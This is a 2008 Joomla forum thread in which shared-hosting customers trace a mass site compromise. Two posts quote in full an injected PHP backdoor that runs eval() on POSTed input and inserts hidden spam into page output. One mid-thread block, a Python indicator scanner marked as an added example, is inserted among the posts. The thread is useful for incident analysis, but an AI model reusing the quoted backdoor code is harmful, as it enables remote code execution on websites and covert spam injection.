Joomla! Discussion Forums
Posted: Mon Jul 28, 2008 12:56 am 
Joomla! Apprentice

Joined: Mon Jul 28, 2008 12:51 am
Posts: 14
I just received this error on my website. No idea why, nothing was recently changed too drastically other than some articles.

Parse error: syntax error, unexpected '<' in /localhost/directory/joomla/environment/uri.php on line 757

Anybody seen this before? I am going to start searching to see what the problem is.


Posted: Mon Jul 28, 2008 1:25 am 
Joomla! Apprentice

Joined: Mon Jul 28, 2008 12:51 am
Posts: 14
It looks like in our cpanel/hsphere the majority of our roles have been switched to httpd:httpd or root:root

This appears to be a hsphere / webshell problem and not a Joomla problem. I'll look into remedying it :'( I was hoping it would be an easy fix.


Posted: Mon Jul 28, 2008 2:53 am 
Joomla! Apprentice

Joined: Mon Jul 28, 2008 12:51 am
Posts: 14
Created virtual FTP folders to change ownership back. Now I have to manually chmod files (hassle). I am finding this line of code pretty often at the end of the PHP files. Does anybody know if it is necessary/how it got there? It is not there on some of my other sites.

It was at the end of /localhost/plugins/system/legacy/functions.php

<?php if(!function_exists('tmp_lkojfghx')){for($i=1;$i<100;$i++)if(is_file($f='/tmp/m'.$i)){include_once($f);break;}if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('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'));function tmp_lkojfghx($s){if($g=(bin2hex(substr($s,0,2))=='1f8b'))$s=gzinflate(substr($s,10,-8));$s1=preg_replace(base64_decode('IzxkaXYgc3R5bGU9J3Bvc2l0aW9uOmFic29sdXRlOyBsZWZ0Oi0xMDAwcHg7IHRvcDotMTAwMHB4Oyc+Lis/PC9kaXY+CiNz'),'',$s);if(stristr($s,'</body'))$s=preg_replace('#(\s*</body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||defined('PMT_knghjg')||stristr($s,'<body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>


Posted: Mon Jul 28, 2008 3:02 am 
Joomla! Apprentice

Joined: Mon Jul 28, 2008 12:51 am
Posts: 14
Forget it. I just uploaded the backup. I may have lost 8 hours' worth of work, but it's not worth hacking code after code to then be hit with another code to hack. This should teach me to get a dedicated host instead of shared.


Posted: Wed Jul 30, 2008 3:44 am 
Joomla! Apprentice

Joined: Mon Jul 28, 2008 12:51 am
Posts: 14
Maybe somebody cares.... This was a virus/hack that was somehow uploaded to our webserver unbeknownst to us. I suspect a webhost problem. It decodes into a Viagra ad. Real nice.


Posted: Fri Aug 01, 2008 12:17 pm 
Joomla! Apprentice

Joined: Fri Aug 01, 2008 11:53 am
Posts: 8
We had the same hack on our websites -- it happened between July 27 & 28.

In ours the div containing the ad was set to be positioned off screen so it wasn't detectable just by browsing the websites. Wouldn't be surprised if there are many other websites affected and they don't know it yet.

Since all of our domains and subdomains were hit I'm also thinking it points to a webserver/host vulnerability.


Posted: Sun Aug 31, 2008 5:56 am 
Joomla! Apprentice

Joined: Wed Feb 06, 2008 7:27 pm
Posts: 29
sdtom wrote:
We had the same hack on our websites -- it happened between July 27 & 28.

In ours the div containing the ad was set to be positioned off screen so it wasn't detectable just by browsing the websites. Wouldn't be surprised if there are many other websites affected and they don't know it yet.

Since all of our domains and subdomains were hit I'm also thinking it points to a webserver/host vulnerability.


Same here, websites hacked the same as above, I had all my sites backed up by my host, everything was fine for 3 weeks and they did it again...
I do not have a clue how..


Posted: Mon Sep 01, 2008 2:13 pm 
Joomla! Apprentice

Joined: Mon Jul 28, 2008 12:51 am
Posts: 14
We are using ixwebhosting. Is that the same company as yours? We just got hacked again.

This could possibly be a local issue though. Now that I think about it, it MAY be a local issue. There are some trojans that mass-collect FTP passwords and then hit the sites all at once. I at first immediately said "not a problem on my end" because I formatted the 3 PCs I use to connect to the site, but I was dumb and did not change my FTP password from last time. I upgraded all of my office's security procedures after last time, so I am pretty sure there's no leak on our end. If only I had changed the password, I would KNOW it's not on my end.


Posted: Mon Sep 01, 2008 5:50 pm 
Joomla! Apprentice

Joined: Fri Aug 01, 2008 11:53 am
Posts: 8
We're at ix also -- we were hacked again Aug 29.

I requested our FTP logs last time it happened and there was nothing unusual in them. Is it possible they could use FTP without it showing up in the logs?


Posted: Mon Sep 01, 2008 5:58 pm 
Joomla! Apprentice

Joined: Mon Jul 28, 2008 12:51 am
Posts: 14
Yea, we got hacked on the 29th too. Knowing you are at IX also makes me really think it is a webhost problem, not a local problem. I'm thinking about switching back to web.com.


Posted: Mon Sep 01, 2008 8:35 pm 
Joomla! Apprentice

Joined: Fri Aug 01, 2008 11:53 am
Posts: 8
Just found that they also got into one of the databases - phpbb. All the other databases were clean. We're looking into changing hosts as well.


Posted: Mon Sep 01, 2008 8:46 pm 
Joomla! Apprentice

Joined: Fri Aug 01, 2008 11:53 am
Posts: 8
depaulus, are you at ix too?


Posted: Tue Sep 02, 2008 4:44 am 
Joomla! Apprentice

Joined: Wed Feb 06, 2008 7:27 pm
Posts: 29
sdtom wrote:
depaulus, are you at ix too?


Yes, I am at IXweb, and I have Googled "<?php if(!function_exists('tmp_lkojfghx')" and "uri.php on line 757"

and so far I have over 15 sites/people with the same problem, AND after doing a "BetterWhois" check, they are ALL hosted with IXweb on PHP 4 servers.
I have called and written to them, but they don't seem to listen..
I have 4 Business Acc. with them and TWO are injected (16 sites!!!!)

EVERYONE using IXweb must call them and let them know

Regards

Paul


Posted: Tue Sep 02, 2008 12:44 pm 
Joomla! Apprentice

Joined: Mon Jul 28, 2008 12:51 am
Posts: 14
Yea, I got hit on 13 of my sites.


Posted: Tue Sep 02, 2008 1:19 pm 
Joomla! Apprentice

Joined: Fri Aug 01, 2008 11:53 am
Posts: 8
depaulus wrote:
... EVERYONE using IXweb must call them and let them know ...


Appreciate the info Paul -- it does look like a webserver vulnerability. I'll be contacting them again. We had 11 sites corrupted.


Posted: Tue Sep 02, 2008 2:15 pm 
Joomla! Apprentice

Joined: Fri Aug 01, 2008 11:53 am
Posts: 8
Also found this in the error logs:

[Fri Aug 29 14:12:04 2008] [error] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)

Apparently DFind is a hacker tool that scans for web vulnerabilities.


Posted: Tue Sep 02, 2008 4:37 pm 
Joomla! Apprentice

Joined: Fri Nov 24, 2006 4:13 pm
Posts: 6
I got the same error. I use IXWebhosting too. I submitted a ticket; I do have a backup which I will try to upload tonight. I am too much of a newbie to really look into my DB to notice changes there. My uri.php file was modified on 1 Sept 2008.

Sample of line 757 in uri.php:
<?php if(!function_exists('tmp_lkojfghx')){for($i=1;$i<100;$i++)if(is_file($f='/tmp/m'.$i)){include_once($f);break;}if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('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'));function tmp_lkojfghx($s){if($g=(bin2hex(substr($s,0,2))=='1f8b'))$s=gzinflate(substr($s,10,-8));$s1=preg_replace(base64_decode('IzxkaXYgc3R5bGU9J3Bvc2l0aW9uOmFic29sdXRlOyBsZWZ0Oi0xMDAwcHg7IHRvcDotMTAwMHB4Oyc+Lis/PC9kaXY+CiNz'),'',$s);if(stristr($s,'</body'))$s=preg_replace('#(\s*</body)#mi',str_replace('\$','\\\$',TMP_XHGFJOKL).'\1',$s1);elseif(($s1!=$s)||defined('PMT_knghjg')||stristr($s,'<body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>


Posted: Tue Sep 02, 2008 11:08 pm 
Joomla! Apprentice

Joined: Tue Sep 02, 2008 11:03 pm
Posts: 18
Add me to the list of people at IX Web Hosting who suffered exactly the same attack. However, only one of my three accounts there [all of which run Joomla] was affected.

I have removed the relevant chunk of code - the one which starts if(!function_exists('tmp_lkojfghx') - from the PHP files I could find, but my pages are still appearing with the Viagra spam at the bottom of them. What else needs to be done to correct this?


Posted: Wed Sep 03, 2008 12:11 am 
Joomla! Apprentice

Joined: Wed Feb 06, 2008 7:27 pm
Posts: 29
AZ SnakePit wrote:
Add me to the list of people at IX Web Hosting who suffered exactly the same attack. However, only one of my three accounts there [all of which run Joomla] was affected.

I have removed the relevant chunk of code - the one which starts if(!function_exists('tmp_lkojfghx') - from the PHP files I could find, but my pages are still appearing with the Viagra spam at the bottom of them. What else needs to be done to correct this.


The code appears on EVERY .php file AND .html file.. cleaning it all up is almost impossible. I have had IX make backups of all my sites... BUT saying that, last week I installed clean backups and everything was fine; one week later the code is injected back into ALL the pages and sites.. Now, however, the same thing is happening on a second account..

I am yet again going to call IX, and this time ask for a manager. I believe that I have more than enough evidence that this is a serious server issue, and until IX web fix the problem, we are up "[censored] creek"

I'll post the outcome of my call.

Regards

Paulus


Posted: Wed Sep 03, 2008 2:16 am 
Joomla! Apprentice

Joined: Tue Sep 02, 2008 11:03 pm
Posts: 18
If IX Web Hosting need another example, the ticket ID for my site is #861417. With all the files being changed to an ownership of httpd, that sounds more like an external exploit of some sort. I have several accounts at IX Web Hosting, but only one was attacked, and that was the one where I had MxComment enabled. I wonder if that was perhaps the source?

Anyway, let us know what IX say - probably denial, I imagine - but also if you need help with any further info from this end.


Posted: Wed Sep 03, 2008 12:20 pm 
Joomla! Apprentice

Joined: Fri Nov 24, 2006 4:13 pm
Posts: 6
Got a reply from IX, they said it was not a webserver vulnerability problem, it was my problem and I needed to check my stuff.

I saw a lot of lines in the logs for joomlaboard/phpbb/forums.website.com etc. etc.
I don't have joomlaboard running (but I may have old tables in my database still).

What is MXcomment???


Posted: Wed Sep 03, 2008 3:26 pm 
Joomla! Apprentice

Joined: Tue Sep 02, 2008 11:03 pm
Posts: 18
MXComment is an add-on for Joomla that allows people to leave comments on entries. If you don't know what it is, you probably don't have it. ;)

I finally found the source of the remaining infection of spam; sounds like it may have been a different kind of attack, as I didn't have the mass infection of HTML pages described above. It took a clean install to get rid of the issue - but then, when I copied the old 'images' folder back over, the problem came right back. To cut a long story short, it turned out there was an infected PHP script in the images directory (tagged with a .jpg extension for stealth). Tied into this, an additional entry had been injected into the jos_mambots database table, which was calling the script in some way. Delete the entry and remove the infected script, and hey presto, no more Viagra spam.

[Should mention I am running 1.0.x, but this was the only place I could find any significant discussion of the issue!]


Posted: Thu Sep 04, 2008 1:29 pm 
Joomla! Apprentice

Joined: Thu Sep 04, 2008 1:23 pm
Posts: 10
Got the same thing here. Twice now. And surprise, IX is my hosting service. I really hope this isn't some stupid coincidence, because I really want to be sure before yelling at IX. Does core know about this yet?


Posted: Thu Sep 04, 2008 3:48 pm 
Joomla! Fledgling

Joined: Thu Sep 04, 2008 3:40 pm
Posts: 1
I'm facing the same exact problem as you guys and I feel IXWebhosting is not doing anything about it.... I have 24 sites in my account, all infected on Sep 01, 2008...

Anybody with better hosting suggestion?
Please let me know


Posted: Fri Sep 05, 2008 3:27 am 
Joomla! Apprentice

Joined: Thu Sep 04, 2008 1:23 pm
Posts: 10
I just got in touch with IX about the issue. The person I talked to was aware of the problem, and told me that they were aware of it as an issue, but couldn't tell me what they were doing about it, just that some people were looking into it. He couldn't give me any specifics at all, but he sounded pretty nervous when I brought up the topic. He couldn't give me any names of people to talk to, but someone I spoke with previously explained that a gentleman named Jason was the guy to talk to, and that he knew of some sort of 'critical file' that needed updating or replacing. It sounds a lot like nobody really understands where the issue is yet... but it sounds to me like there is a vulnerability on one of IX's servers which is being exploited, and they haven't nailed down what it is yet. I was hacked on version 1.5.5, but since then, I've patched to 1.5.6. I don't think this will solve anything, but here's to hoping.

Which package are you all using? I'm on one of IX's old servers, and I was thinking about migrating to one of the newer ones. (Apparently there's a newer version of the control panel with access to php.ini settings without using .htaccess hacks). I'm curious if this is specific to one of their servers, or all of them.

Cheers.


Posted: Sat Sep 06, 2008 4:43 am 
Joomla! Intern

Joined: Wed Nov 15, 2006 7:33 pm
Posts: 64
AZ SnakePit wrote:
MXComment is an add-on for Joomla that allows people to leave comments on entries. If you don't know what it is, you probably don't have it. ;)

I finally found the source of the remaining infection of spam; sounds like it may have been a different kind of attack, as I didn't have the mass infection of HTML pages described above. It took a clean install to get rid of the issue - but then, when i copied the old 'images' folder back over, the problem came right back. To cut a long story short, it turned out there was an infected PHP script in the images directory (tagged with a .jpg extension for stealth). Tied into this, an additional entry had been injected into the jos_mambots database table, which was calling the script in some way. Delete the entry and remove the infected script, and hey presto, no more Viagra spam.

[Should mention I am running 1.0.x, but this was the only place I could find any significant discussion of the issue!]


I am in the same boat. Just prior to the hack I had uploaded a fresh copy of Joomla 1.5, set it to offline and came back a week later to find the parse error. I don't, however, have MXComment. Looks like you have a solution.

I had a double hack. When I originally installed Joomla 1.0, I set my folders to public writable as requested in the installation step, and I got hacked by some weird stuff and anti-government ads. I spoke to IX and they said I should not allow public write access. So I decided to upgrade to 1.5 and this happened.


Posted: Mon Sep 08, 2008 7:46 pm 
Joomla! Fledgling

Joined: Mon Sep 08, 2008 7:43 pm
Posts: 1
sdtom wrote:
Just found that they also got into one of the databases - phpbb. All the other databases were clean. We're looking into changing hosts as well.


I am also with IX and have the same problem on 4 sites hosted there. Joomla and phpbb. Where in the database was the injection found? I can't seem to find it, and I know it is there.

-Scott


Posted: Mon Sep 08, 2008 8:43 pm 
Joomla! Apprentice

Joined: Fri Aug 01, 2008 11:53 am
Posts: 8
Vulcan5 wrote:
I am also with IX and have the same problem on 4 sites hosted there. Joomla and phpbb. Where in the database was the injection found? I can't seem to find it, and I know it is there.

-Scott


Two places --
In the phpbb_config table, where config_name=site_desc, they had added the hack to the config_value field.
In phpbb_categories table they'd added a new category which caused their trash to show up in the "Jump To" dropdown at the bottom of each forum.

You may want to do an export or backup of the database, so you can use a text search to find any other injections.
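A defender-side scanner for the indicators quoted in this thread, covering both the questions above: the files still carrying the injected tmp_lkojfghx block (including scripts hidden under an image extension, as found in the images folder) and a text export of the database (the phpbb_config site_desc injection). The off-screen div style it looks for is the literal inside the base64-encoded regex in the quoted injected code. This is an added example, not code from the thread or from Joomla; the sample tree and SQL dump it scans are constructed.

```python
import os
import re
import tempfile

# Indicators lifted from the injected code quoted in this thread. The off-screen div
# style is the literal inside the base64-encoded regex the injected tmp_lkojfghx() uses.
INDICATORS = {
    "tmp_lkojfghx_marker": re.compile(r"function_exists\('tmp_lkojfghx'\)"),
    "post_eval_backdoor": re.compile(r"eval\(\$_POST\['tmp_lkojfghx3'\]\)"),
    "tmp_include_loader": re.compile(r"is_file\(\$f='/tmp/m'\.\$i\)"),
    "offscreen_div": re.compile(r"<div style='position:absolute; left:-1000px; top:-1000px;'>", re.I),
}
IMAGE_EXT = {".jpg", ".jpeg", ".gif", ".png"}

def find_hits(text):
    """Return [(line_number, indicator_name)] for every indicator match in text."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for name, rx in INDICATORS.items():
            if rx.search(line):
                hits.append((lineno, name))
    return hits

def scan_tree(root):
    """Walk every file under root regardless of extension; map relative path -> hits."""
    report = {}
    for dirpath, _, files in os.walk(root):
        for fname in files:
            path = os.path.join(dirpath, fname)
            with open(path, "rb") as fh:
                text = fh.read().decode("utf-8", "replace")
            hits = find_hits(text)
            # A "picture" whose bytes begin with a PHP open tag is a script in disguise.
            if os.path.splitext(fname)[1].lower() in IMAGE_EXT and text.lstrip().startswith("<?php"):
                hits.append((1, "php_in_image_file"))
            if hits:
                report[os.path.relpath(path, root)] = hits
    return report

def scan_sql_dump(dump_text):
    """Same indicators over a text export of the database (e.g. phpbb_config site_desc)."""
    return find_hits(dump_text)

def build_sample_tree():
    """Constructed sample site (not real files from the thread) for a dry run."""
    root = tempfile.mkdtemp(prefix="scan_demo_")
    os.makedirs(os.path.join(root, "images"))
    samples = {
        "index.php": "<?php\necho 'clean page';\n",
        "uri.php": "<?php\n// ... normal code ... ?>\n<?php if(!function_exists('tmp_lkojfghx')){\n"
                   "if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);}\n",
        "images/photo.jpg": "<?php /* constructed: a script hiding under a .jpg name */\n",
    }
    for rel, body in samples.items():
        with open(os.path.join(root, rel), "w") as fh:
            fh.write(body)
    return root

# Constructed phpBB export lines mimicking the site_desc injection described above.
SAMPLE_DUMP = (
    "INSERT INTO phpbb_config VALUES ('site_name','Demo');\n"
    "INSERT INTO phpbb_config VALUES ('site_desc','Forum<div style='position:absolute; "
    "left:-1000px; top:-1000px;'>spam</div>');\n"
)
```

Run scan_tree() over the site root and scan_sql_dump() over a mysqldump export; build_sample_tree() gives a constructed tree for a dry run, and every reported line still needs a human look before deleting anything.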


Posted: Tue Sep 09, 2008 9:11 am 
Joomla! Fledgling

Joined: Tue Sep 09, 2008 9:04 am
Posts: 4
Hi guys,
I'm also with ixwebhosting, and have been hit with the same thing, however I'm running OSCommerce (I realise this forum is for Joomla!).

I am pretty sure I have removed the code added to all my php files, which leads me to believe it was inside the mysql database.

Even worse, the database backup I took the other day and installed locally has given my local copy the same thing, which to me implies the dodgy code is somewhere in the database. Except I can't find it.

Any ideas on how to find it using phpmyadmin? I *really* don't want to restore the site, last time I had all sorts of problems getting it right again. Ideally I just want to get rid of the code.

Cheers
Scott


Posted: Tue Sep 09, 2008 9:56 am 
Joomla! Fledgling

Joined: Tue Sep 09, 2008 9:04 am
Posts: 4
Oops, on further investigation, I must have downloaded one of the dodgy files onto my local PC. That's why my local version was displaying the error. Which means I must have at least one file on the webserver hanging around. I'll hunt it down and get rid of it.

Cheers
Scott

